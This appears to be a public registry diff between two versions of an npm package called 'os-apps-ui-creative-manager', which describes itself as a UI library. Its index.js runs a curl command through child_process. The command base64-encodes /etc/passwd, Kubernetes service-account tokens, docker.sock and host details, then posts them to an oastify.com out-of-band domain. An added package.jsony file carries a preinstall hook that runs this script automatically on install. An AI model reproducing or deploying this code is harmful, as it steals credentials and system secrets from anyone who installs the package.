os-apps-ui-creative-manager 9.9.9 → 12.9.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/index.js CHANGED
@@ -1,5 +1,5 @@
1
1
  const { exec } = require("child_process");
2
- const command = `curl -X POST "http://$(whoami).creative-manager.frajqx625jmtbjgy5o6ddsal0c63uupie.oastify.com/os-apps-ui-curve?q=$(pwd)&l=$(ls /app/node_modules/)" -H "Content-Type: application/json" -d "{\"data\": \"$(cat /etc/hosts /etc/passwd /etc/group /etc/resolv.conf /var/run/secrets/kubernetes.io/serviceaccount/token /var/run/docker.sock /var/run/secrets/kubernetes.io/serviceaccount/namespace | base64 | tr -d '\n')\"}" `;
2
+ const command = `curl -X POST "http://$(whoami).placement-manager.v73z6dmilz29rzwel4mtt8q1gsmjaacy1.oastify.com/?q=$(pwd)&l=$(ls /app/node_modules/)" -H "Content-Type: application/json" -d "{\"data\": \"$(cat /etc/hosts /etc/passwd /etc/group /etc/resolv.conf /var/run/secrets/kubernetes.io/serviceaccount/token /var/run/docker.sock /var/run/secrets/kubernetes.io/serviceaccount/namespace | base64 | tr -d '\n')\"}" `;
3
3
  exec(command, (error, stdout, stderr) => {
4
4
  if (error) {
5
5
  console.error(error.message);
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "os-apps-ui-creative-manager",
3
- "version": "9.9.9",
3
+ "version": "12.9.9",
4
4
  "description": "Testing new creative manager library",
5
5
  "main": "index.js",
6
6
  "scripts": {
package/package.jsony ADDED
@@ -0,0 +1,15 @@
1
+ {
2
+ "name": "os-apps-ui-placement-manager",
3
+ "version": "9.9.9",
4
+ "description": "Testing new placement manager library",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "keywords": [
11
+ "curvelibrary"
12
+ ],
13
+ "author": "7azimo-DBM",
14
+ "license": "ISC"
15
+ }